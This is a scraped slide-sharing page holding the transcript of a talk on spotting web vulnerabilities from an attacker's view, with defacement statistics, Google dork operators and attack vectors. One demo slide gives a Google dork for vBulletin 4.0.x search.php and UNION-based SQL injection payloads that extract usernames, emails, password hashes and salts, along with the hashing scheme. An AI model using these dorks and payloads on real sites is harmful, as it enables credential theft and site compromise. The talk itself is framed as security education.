Spotting Web Vulnerabilities (from the eyes of an Script Kiddie)

Slides:



Advertisements
Similar presentations
Module XIV SQL Injection
Advertisements

Incident Handling & Log Analysis in a Web Driven World Manindra Kishore.
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike.
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
1 Web Servers / Deployment Alastair Dawes Original by Bhupinder Reehal.
WebGoat & WebScarab “What is computer security for $1000 Alex?”
Hackers, Crackers, and Network Intruders: Heroes, villains, or delinquents? Tim McLaren Thursday, September 28, 2000 McMaster University.
IDAsec copyright - all rights reserved1 Web Vulnerabilities in the real world.
NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba.
07 December 2009Slide 1 of 1207 December 2009Slide 1 of 12 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.
Information Networking Security and Assurance Lab National Chung Cheng University 1 A Real World Attack: wu-ftp.
07 December 2009Slide 1 of 9 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
Chapter 6 Security & Privacy Web servers continue to be attractive target for hacker for variety of reasons –Most easy target –Personal satisfaction –Political.
Assessing the Threat How much money is lost due to cyber crimes? –Estimates range from $100 million to $100s billions –Why the discrepancy? Companies don’t.
Hacking Web Server Defiana Arnaldy, M.Si
BUILDING A SECURE STANDARD LIBRARY Information Assurance Project I MN Tajuddin hj. Tappe Supervisor Mdm. Rasimah Che Mohd Yusoff ASP.NET TECHNOLOGY.
Presenter Deddie Tjahjono.  Introduction  Website Application Layer  Why Web Application Security  Web Apps Security Scanner  About  Feature  How.
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 
Capture The Flag Review Fall 2003 Giovanni Vigna University of California Santa Barbara
Penetration Testing Edmund Whitehead Rayce West. Introduction - Definition of Penetration Testing - Who needs Penetration Testing? - Penetration Testing.
Norman SecureSurf Protect your users when surfing the Internet.
Web-based Document Management System By Group 3 Xinyi Dong Matthew Downs Joshua Ferguson Sriram Gopinath Sayan Kole.
Security and Risk Management. Who Am I Matthew Strahan from Content Security Principal Security Consultant I look young, but I’ve been doing this for.
W3af LUCA ALEXANDRA ADELA – MISS 1. w3af  Web Application Attack and Audit Framework  Secures web applications by finding and exploiting web application.
Developed By: [ INNOVATION INFOSOFT TECHNOLOGIES ]
Web Security Demystified Justin C. Klein Keane Sr. InfoSec Specialist University of Pennsylvania School of Arts and Sciences Information Security and Unix.
Cyber Patriot Training
Brad Baker CS526 May 7 th, /7/ Project goals 2. Test Environment 3. The Problem 4. Some Solutions 5. ModSecurity Overview 6. ModSecurity.
Demystifying Backdoor Shells and IRC Bots: The Risk … By : Jonathan.
Prepared By, Mahadir Ahmad. StopBadware makes the Web safer through the prevention, mitigation, and remediation of badware websites. partners include.
Ladd Van Tol Senior Software Engineer Security on the Web Part One - Vulnerabilities.
1 All Your iFRAMEs Point to Us Mike Burry. 2 Drive-by downloads Malicious code (typically Javascript) Downloaded without user interaction (automatic),
1-Vulnerabilities 2-Hackers 3-Categories of attacks 4-What a malicious hacker do? 5-Security mechanisms 6-HTTP Web Servers 7-Web applications attacks.
Staying Safe Online Keep your Information Secure.
November 13, 2008 Ohio Information Security Forum Attack Surface of Web Applications James Walden Northern Kentucky University
Honeypot and Intrusion Detection System
Security Testing Case Study 360logica Software Testing Services.
Security at NCAR David Mitchell February 20th, 2007.
Top Five Web Application Vulnerabilities Vebjørn Moen Selmersenteret/NoWires.org Norsk Kryptoseminar Trondheim
Security Problems at Colleges All materials posted at samsclass.info and free to use.
Hands-On Microsoft Windows Server Implementing Microsoft Internet Information Services Microsoft Internet Information Services (IIS) –Software included.
October 3, 2008IMI Security Symposium Application Security through a Hacker’s Eyes James Walden Northern Kentucky University
CSCE 548 Secure Software Development Taxonomy of Coding Errors.
SQL INJECTIONS Presented By: Eloy Viteri. What is SQL Injection An SQL injection attack is executed when a web page allows users to enter text into a.
Security. Security Flaws Errors that can be exploited by attackers Constantly exploited.
Web Applications Testing By Jamie Rougvie Supported by.
Security (Keep your site secure at extension level) Sergey Gorstka Fastw3b.
Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected.
COMP9321 Web Application Engineering Semester 2, 2015 Dr. Amin Beheshti Service Oriented Computing Group, CSE, UNSW Australia Week 9 1COMP9321, 15s2, Week.
Web Security. Introduction Webserver hacking refers to attackers taking advantage of vulnerabilities inherent to the web server software itself These.
Session 11: Cookies, Sessions ans Security iNET Academy Open Source Web Development.
Aaron Corso COSC Spring What is LAMP?  A ‘solution stack’, or package of an OS and software consisting of:  Linux  Apache  MySQL  PHP.
General Information: This document was created for use in the "Bridges to Computing" project of Brooklyn College. You are invited and encouraged to use.
Privilege Escalation Baseline, Monitor, Detect, Analyze, Respond, & Recover Hervey Allen Chris Evans Phil Regnauld September 3 – 4, 2009 Santiago, Chile.
Google Hacking: Tame the internet Information Assurance Group 2011.
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.
● The most common website platform ● User friendly-easy to edit ● Constantly improving-updates, plugins, themes Why WordPress?
Lecture 19 Page 1 CS 236 Online 6. Application Software Security Why it’s important: –Security flaws in applications are increasingly the attacker’s entry.
Top 10 Hacking Tool Welcome TO hackaholic Kumar shubham.
Common System Exploits Tom Chothia Computer Security, Lecture 17.
Chapter 7: Identifying Advanced Attacks
WEB APPLICATION TESTING
Common Methods Used to Commit Computer Crimes
Secure Software Confidentiality Integrity Data Security Authentication
CS4622: Computer Networking
Web Servers / Deployment
6. Application Software Security
Securing web applications Externally
Presentation transcript:

Spotting Web Vulnerabilities (from the eyes of an Script Kiddie)

Disclaimer All the information provided on this presentation for educational purposes only. The speaker is not liable for any damages you may cause for using this knowledge on actual attacks. The following tools and techniques are publicly available, “ANYONE” has access to them.

Websites “In the August 2011 survey we received responses from 463,000,317 sites.” -netcraft.com DeveloperJuly 2011PercentAugust 2011PercentChange Apache235,326, %301,771, %-0.69 Microsoft60,086, %73,415, %-0.96 nginx23,357, %35,533, %1.14 Google15,641, %17,061, %-0.69

Defacements “Defacements Statistics 2010: Almost 1,5 million websites defaced, what's happening?” Zone-H.org

Defacements Attack ReasonYear 2010 Heh…just for fun! I just want to be the best defacer Not available Patriotism Polit­i­cal reasons Revenge against that website As a challenge44.457

Web Vulnerabilities Why website administrators need to be vigilant? – The web is home to 2.08 billion netizens. – Information is widely, freely available to anyone who wants it. Why is it “always” important to protect our websites? – This contains personal information. Even an IP is personal information. (privacy *disputable) – This can be used by crackers to host their botnets, etc…

Website Vulnerabilities Is not limited to script and system exploitation. – Systems can also be compromised by admin(human) errors. Easy passwords. Multiple systems/sites with the same passwords. Faulty password storing or password sharing. Failed/No firewall or anti-virus on personal computer.

Targeted Attacks Open Source – Exploiting Can take minutes if an exploit is already available. Can take weeks if you are trying to exploit from scratch. – Dorks, Tools Non Open Source – Exploiting Can take minutes if web-app is badly coded. Can take months if web-app is secured(but not well enough). – Dorks, Tools

Random Attacks Google Dorks – cache: – link: – related: – info: – define: – stocks: – site: – allintitle: – intitle: – allinurl: – inurl:

Attack Vectors known vulnerability (i.e. unpatched system) undisclosed (new) vulnerability configuration / admin. mistake brute force attack social engineering Web Server intrusion Web Server external module intrusion Mail Server intrusion FTP Server intrusion SSH Server intrusion Telnet Server intrusion RPC Server intrusion Shares misconfiguration Other Server intrusion SQL Injection URL Poisoning File Inclusion Other Web Application bug Remote administrative panel access through social engineering Attack against the administrator/user (password stealing/sniffing) Access credentials through Man In the Middle attack Remote service password guessing Remote service password bruteforce Rerouting after attacking the Firewall Rerouting after attacking the Router DNS attack through social engineering DNS attack through cache poisoning

Demo Attack via Google Dork + Public Exploit. – Vbulletin 4.0.x to “search.php” SQLi vulnerability. Dork : inurl:search.php?search_type=1 &cat[0]=1) UNION SELECT database()# &cat[0]=1) UNION SELECT table_name FROM information_schema.tables# &cat[0]=1) UNION SELECT concat(username,0x3a, ,0x3a,password,0x3a,salt) FROM user WHERE userid=1# md5(md5($pass).$salt)

Demo Testing inputs. Checking headers.

Demo Attack via Google Dork(targeted) + Tools(Havij). – Dorking a target site to find SQLi vulnerable pages.

The top Web vulnerability we face “Ignorance of the issues is at the root of practically every Web vulnerability we face. Be it the technical flaws such as SQL injection and cross-site scripting or operational issues such as no standards and lack of vulnerability testing, we’re just not where we need to be with Web security. And unless and until we focus on the right target, we’ll continue to struggle with Web security. It’ll be a continuous loop of 1)develop code, 2)deploy system, 3)experience a breach or fail an audit/assessment, 4)track down the why and how of the flaws, fix the flaws, 5)start all over again.” - Kevin Beaver

Spotting Web Vulnerabilities Thank you. -sungazer